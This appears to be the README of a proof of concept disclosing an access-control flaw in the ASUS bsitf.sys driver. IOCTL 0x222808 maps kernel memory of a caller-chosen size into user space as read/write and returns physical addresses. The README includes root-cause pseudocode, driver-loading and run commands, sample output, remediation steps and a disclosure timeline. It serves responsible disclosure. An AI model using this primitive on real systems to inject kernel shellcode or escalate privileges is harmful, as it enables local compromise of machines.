# POC - ASUS bsitf.sys Kernel Memory Mapping to Usermode ## Summary The ASUS `bsitf.sys` (also distributed as `AsusBSItf.sys`) kernel driver exposes IOCTL `0x222808` which allocates physically contiguous kernel memory of attacker-controlled size and maps it into the calling process's address space with full read/write permissions. No access control is enforced. The physical address of the allocation is returned to the caller. Any local user can trigger this IOCTL through the `\\.\bsitf` device symlink. ## Affected Versions | Version | Filename | Package | Pool Type | |---------|----------|---------|-----------| | 3.0.10.0 | bsitf.sys | ASUS Business Manager / AbmSvcPackage | `NonPagedPool` (executable) | | 3.1.10.0 | AsusBSItf.sys | ASUS SCI / AsusSoftwareManager | `NonPagedPoolNx` | | 3.1.25.0 | AsusBSItf.sys | ASUS SCI / AsusSoftwareManager | `NonPagedPoolNx` | All versions create device `\Device\bsitf` with symlink `\DosDevices\bsitf`. ## Impact - **Usermode R/W to kernel pool memory** — the mapped region is fully readable and writable from Ring-3 - **Executable kernel memory** (v3.0.x) — `NonPagedPool` allocations are executable, enabling shellcode injection - **Physical address disclosure** — the IOCTL returns the physical address of every allocation - **Kernel pool exhaustion** — repeated allocations without freeing cause system BSOD ## Root Cause IOCTL `0x222808` in the dispatch handler performs the following with no validation: ```c alloc_size = *(DWORD *)Irp->AssociatedIrp.SystemBuffer; // user-controlled kernel_va = MmAllocateContiguousMemory(alloc_size, 0xffffffff); mdl = IoAllocateMdl(kernel_va, alloc_size, FALSE, FALSE, NULL); MmBuildMdlForNonPagedPool(mdl); user_va = MmMapLockedPages(mdl, UserMode); output[0] = user_va; // usermode virtual address output[1] = physical_addr; // physical address of allocation ``` No checks on caller privilege, allocation size, outstanding allocation count, or device ACLs. ## Proof of Concept ### Build ``` cargo build --release ``` ### Load the driver ``` sc create bsitf binPath= "C:\path\to\bsitf.sys" type= kernel sc start bsitf ``` ### Run ``` # default: 0x1000 (4KB) allocation cargo run --release # custom size (hex) cargo run --release -- 10000 ``` ### Expected output ``` [*] bsitf.sys kernel memory mapping PoC [*] target alloc size: 0x1000 [+] device handle acquired [*] allocating 0x1000 bytes of kernel memory via IOCTL 0x222808 [+] kernel allocation succeeded: usermode VA: 0x000001D856F90000 physical addr: 0x00000000BF6CB000 [*] original contents (first 16 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [*] writing 0xCC pattern (int3 sled)... [+] readback: usermode R/W CONFIRMED [*] freeing kernel mapping via IOCTL 0x22280C [+] mapping freed successfully ``` Tested on Windows 11 24H2. ## Remediation 1. Restrict device access via ACL to SYSTEM or specific service accounts 2. Validate allocation size with a reasonable upper bound 3. Do not map kernel allocations into usermode address space 4. Do not return physical addresses to usermode callers 5. Use `NonPagedPoolNx` on all versions ## Timeline | Date | Event | |------|-------| | 2026-04-06 | Vulnerability discovered via automated analysis | | 2026-04-06 | PoC confirmed on Windows 11 24H2 | | 2026-04-XX | Report submitted to ASUS PSIRT | ## References - [CWE-782: Exposed IOCTL with Insufficient Access Control](https://cwe.mitre.org/data/definitions/782.html) - Device: `\Device\bsitf`, Symlink: `\DosDevices\bsitf` - Dispatch handler: `FUN_140001070` ## Disclaimer This proof of concept is provided for authorized security research and responsible disclosure purposes only. Do not use this against systems you do not own or have explicit permission to test.